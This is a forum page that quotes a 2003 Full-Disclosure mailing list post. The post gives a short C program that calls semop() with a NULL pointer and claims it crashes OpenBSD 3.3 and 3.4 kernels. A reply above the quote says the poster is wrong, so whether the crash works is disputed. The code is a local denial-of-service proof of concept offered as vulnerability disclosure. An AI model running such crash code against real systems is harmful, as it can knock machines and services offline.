vBulletin Search Engine Optimization
| |||||||
| Register | FAQ | Members List | Calendar | Search | Today's Posts | Mark Forums Read |
| ||||
| Tried this out. This guy is FOS (full of shit) -----Original Message----- From: full-disclosure-admin@lists.netsys.com [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of noir@uberhax0r.net Sent: Friday, November 21, 2003 2:44 PM To: full-disclosure@lists.netsys.com Subject: [Full-Disclosure] yet another panic() in OpenBSD a project lacking the basic QA and unit testing and here is the outcome: #include <stdio.h> #include <sys/types.h> #include <sys/sem.h> #include <sys/ipc.h> int main() { int i; for(i = 0; i < 0x40; i++) semop(i, (struct sembuf *) NULL, 0); } PANIC in OpenBSD 3.3 and 3.4 is confirmed. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html |
| Thread Tools | |
| Display Modes | |
|
|